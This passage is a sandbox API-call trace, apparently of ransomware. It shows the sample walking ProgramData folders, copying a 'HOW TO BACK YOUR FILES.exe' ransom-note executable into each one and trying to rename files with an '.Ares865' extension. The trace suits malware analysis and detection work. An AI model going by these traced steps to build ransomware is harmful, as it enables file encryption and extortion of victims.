[0090.599] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.599] CloseHandle (hObject=0x120) returned 1 [0090.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.599] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x646c9cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.599] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.599] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.600] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search" [0090.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3212c0 | out: hHeap=0x2b0000) returned 1 [0090.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.600] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search") returned 69 [0090.600] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search" [0090.600] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.600] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\search\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.600] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.601] GetLastError () returned 0x0 [0090.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.601] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.601] CloseHandle (hObject=0x120) returned 1 [0090.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.601] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.601] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data" [0090.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335428 | out: hHeap=0x2b0000) returned 1 [0090.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.601] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data") returned 74 [0090.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data" [0090.601] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.601] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\search\\data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.602] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.602] GetLastError () returned 0x0 [0090.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.602] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.602] CloseHandle (hObject=0x120) returned 1 [0090.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.602] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.602] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications" [0090.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.603] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications") returned 87 [0090.603] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications" [0090.603] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\search\\data\\applications\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.603] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.603] GetLastError () returned 0x0 [0090.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.603] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.603] CloseHandle (hObject=0x120) returned 1 [0090.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.604] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.604] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.604] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC" [0090.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0090.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.604] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC") returned 66 [0090.604] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC" [0090.604] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.604] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.605] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.605] GetLastError () returned 0x0 [0090.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.605] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.605] CloseHandle (hObject=0x120) returned 1 [0090.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.605] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData" [0090.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0090.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0090.605] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData") returned 76 [0090.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData" [0090.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\statedata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.606] GetLastError () returned 0x0 [0090.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.606] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.606] CloseHandle (hObject=0x120) returned 1 [0090.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.606] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.607] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 100 [0090.607] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.607] GetLastError () returned 0x20 [0090.607] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 122 [0090.607] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 122 [0090.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.607] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x48ff [0090.607] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x7a, lpOverlapped=0x0) returned 1 [0090.607] CloseHandle (hObject=0x118) returned 1 [0090.607] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.608] CloseHandle (hObject=0x0) returned 0 [0090.608] CloseHandle (hObject=0x0) returned 0 [0090.608] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.608] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.608] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0090.608] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData" [0090.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.608] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData") returned 80 [0090.608] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData" [0090.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\publisheddata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.608] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.609] GetLastError () returned 0x0 [0090.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.609] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.609] CloseHandle (hObject=0x120) returned 1 [0090.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.609] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.609] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.609] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound" [0090.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335428 | out: hHeap=0x2b0000) returned 1 [0090.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.609] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound") returned 75 [0090.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound" [0090.609] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.609] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\outbound\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.610] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.610] GetLastError () returned 0x0 [0090.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.610] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.610] CloseHandle (hObject=0x120) returned 1 [0090.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.611] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform" [0090.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0090.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0090.611] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 95 [0090.611] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application 